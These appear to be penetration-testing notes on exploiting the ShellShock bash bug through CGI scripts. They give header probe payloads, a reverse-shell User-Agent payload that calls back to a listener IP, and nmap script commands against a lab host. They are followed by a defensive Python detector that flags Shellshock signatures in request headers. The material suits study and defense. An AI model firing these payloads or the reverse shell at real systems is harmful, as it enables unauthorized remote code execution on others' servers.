# ShellShock

**ShellShocked:**\
If the target exposes a CGI script (cgi-bin is the directory where code that interfaces a website with some other service is placed) and runs an old, unpatched version of bash, it may be vulnerable. In the sample below the file was called user.sh.

Checking if vulnerable:\
Proxy the request through Burp, then change the User-Agent header to one of the following.\
Direct test: `() { :; };/bin/echo; echo *hello*` // also try without /bin/\
Blind test: `() { :; }; sleep 10` // check whether the response arrives about 10 seconds slower than normal\
\---may also have to try variations of this if the server is confused---\
Blind test: `() { :;}; echo; sleep 10`\
Blind test: `() { :;}; /bin/echo; sleep 10`

Manual exploit:\
Open a nc listener, then put the string below in the User-Agent header.\
`() { :; }; echo; bash -i >& /dev/tcp/10.10.15.135/8081 0>&1`\
or try\
`() { :; }; echo; /bin/bash -c ls`

Auto NSE script (also tries several other headers, such as Cookie and Referer):\
`# locate nse | grep shellshock`\
`# nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56` // it is useful to proxy this through Burp: keep cmd=ls, point nmap at 127.0.0.1 with -p8081, and run a Burp listener on that local port forwarding to the site.\
Then look for the shellshock request in Burp's history and send it to Repeater.

Sample of what it sends:

![](/files/oFKm0e10QkqhokxuCpz7)

sample modification to try if its not working:

![](/files/pD21eJq9hN7BlfDYOTWf)
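
As an added example for the receiving side (this is not part of the original notes and not the nmap script's code), the Python below shows how a proxy or log reviewer can spot the probes listed above: it parses raw HTTP requests and flags every header whose value begins with the bash function-definition prefix `() { ... };`, tolerating the spacing variants (`:; }` and `:;}`). All headers are checked, not only User-Agent, because a CGI server exports Cookie, Referer and the rest as environment variables as well, which is exactly why the NSE script tries them. The sample requests, hostnames and paths are constructed placeholders.

```python
import re
from typing import Dict, List, Tuple

# Signature of the Shellshock trigger: a header value that starts with a bash
# function definition "() { ... }" followed by ";" and trailing commands.
# "[^}]*" tolerates both "() { :; };" and "() { :;};" from the checks above.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{[^}]*\}\s*;")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split a raw HTTP request (request line plus headers) into a dict.

    Header names are lower-cased; the value is split at the first ':' only,
    so a payload containing ':' (as "() { :; }" does) stays intact.
    """
    lines = raw_request.strip().splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:          # skip the request line
        if not line.strip():
            break                   # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def find_shellshock_headers(raw_request: str) -> List[str]:
    """Return the names of all headers in one request carrying the signature."""
    return [name for name, value in parse_headers(raw_request).items()
            if SHELLSHOCK_RE.search(value)]


def scan_requests(requests: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (index, flagged_headers) for each request that matches."""
    hits: List[Tuple[int, List[str]]] = []
    for i, req in enumerate(requests):
        found = find_shellshock_headers(req)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample requests (not captured traffic). The first two mimic the
# blind and direct probes from the notes; the third is ordinary browser traffic.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/user.sh HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: () { :; }; echo; sleep 10\r\n\r\n",
    "GET /cgi-bin/user.sh HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: () { :;}; /bin/echo; echo probe\r\n"
    "Referer: () { :; }; echo; /bin/bash -c ls\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n",
]

if __name__ == "__main__":
    for idx, names in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: shellshock pattern in header(s) {names}")
```

The regex is anchored at the start of the header value because the bash bug only fires when the environment variable begins with the function definition; a stray `() {` in the middle of a value does not trigger it, so anchoring keeps the false-positive rate down while still catching the variants used above.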

